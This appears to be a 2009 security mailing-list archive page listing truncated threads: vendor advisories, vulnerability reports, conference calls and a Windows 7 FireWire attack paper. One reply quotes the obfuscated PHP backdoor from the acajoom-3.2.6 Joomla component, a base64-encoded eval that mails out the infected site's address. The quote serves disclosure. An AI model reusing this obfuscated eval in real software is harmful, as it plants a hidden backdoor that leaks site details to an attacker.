[USN-816-1] fetchmail vulnerability

2009-08-13 Thread Kees Cook
=== Ubuntu Security Notice USN-816-1 August 12, 2009 fetchmail vulnerability CVE-2009-2666 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu

Elkapax CMS Cross site scripting vulnerability

2009-08-13 Thread faghani
IUT-CERT. Title: Elkapax CMS Multiple Vulnerabilities. Vendor: www.elkapax.com. Type: Input.Validation.Vulnerability (Cross Site Scripting). Fix: N/A. nsec.ir. Description: Elkapax is a

Authentication Bypass of Snom Phone Web Interface

2009-08-13 Thread Walter Sprenger
COMPASS SECURITY ADVISORY http://www.csnc.ch/en/downloads/advisories.html Product: Snom VoIP/SIP Phones (Snom300, Snom320, Snom360, Snom370,

Windows 7 Firewire Attacks - and Defense Techniques

2009-08-13 Thread Security Research Publications
Hello, In the course of the Windows 7 RTM release, the Security Research Lab would like to share some results on firewire/DMA based hacks and Windows 7, which is susceptible to such attacks. While the attack vector itself is already known from previous Windows versions, we also describe the

[security bulletin] HPSBMA02447 SSRT090062 rev.1 - Insight Control Suite For Linux (ICE-LX) Cross Site Request Forgery (CSRF) , Remote Execution of Arbitrary Code, Denial of Service (DoS), and Other V

2009-08-13 Thread security-alert
SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01820968 Version: 1 HPSBMA02447 SSRT090062 rev.1 - Insight Control Suite For Linux (ICE-LX) Cross Site Request Forgery (CSRF) , Remote Execution of Arbitrary Code, Denial of Service (DoS),

Static analysis tool exposition (SATE) 2009 - call for participation

2009-08-13 Thread Vadim Okun
We are preparing an exposition for static analysis tools that find security relevant defects. Briefly, participating tool makers run their tools on real programs. Researchers led by NIST analyze the tool reports. Everyone reports results and experiences at a workshop. The tool reports and

Chris Paget Defcon RFID Presentation Slides Now Online

2009-08-13 Thread Timothy (Thor) Mullen
Greetings. The slides for Chris Paget's DEFCON 17 RFID Presentation are now online and available at: http://www.h4rdw4re.com/public/H4RDW4RE_RFID_Defcon17.zip As the many who attended the session know, the presentation was cut short due to time restrictions (the Adam Savage talk behind us

Fwd: Follow-up: Heartland CEO on Data Breach: QSAs Let Us Down

2009-08-13 Thread Jeffrey Walton
From the folks at Attrition and the DatalossDB. -- Forwarded message -- From: security curmudgeon jeri...@attrition.org Date: Aug 12, 2009 4:22 PM Subject: Follow-up: Heartland CEO on Data Breach: QSAs Let Us Down To: dataloss-disc...@datalossdb.org, datal...@datalossdb.org

Re: Re: Re: Back door trojan in acajoom-3.2.6 for joomla

2009-08-13 Thread elkekas
not are stupids, there are one virus. function GetBots($us1,$us2,$us3) { list($data1,$data2,$data3) = array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ', 'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs'); eval(base64_decode($data2.$data1.$data3)); }

KIWICON ]|[ - 2009 Call For Papers

2009-08-13 Thread Kiwicon 3
A wise deadite captain once yelled "Cry Havoc and let loose the Dogs of War!". Quite frankly, we couldn't have said it better ourselves:

Linux NULL pointer dereference due to incorrect proto_ops initializations

2009-08-13 Thread Tavis Ormandy
Linux NULL pointer dereference due to incorrect proto_ops initializations - In the Linux kernel, each socket has an associated struct of operations called proto_ops which contain pointers to functions implementing various

[IMF 2009] Call for Participation

2009-08-13 Thread Oliver Goebel
Dear all, please find enclosed the call for participation for IMF 2009. See the program at: http://www.imf-conference.org/imf2009/program.html The conference will be held from Tuesday (Sept. 15th) through Wednesday (Sept. 16th). On Thursday (Sept. 17th) selected topics will be addressed in

[SECURITY] [DSA 1861-1] New libxml packages fix several issues

2009-08-13 Thread Nico Golde
Debian Security Advisory DSA-1861-1 secur...@debian.org http://www.debian.org/security/ Nico Golde August 13th, 2009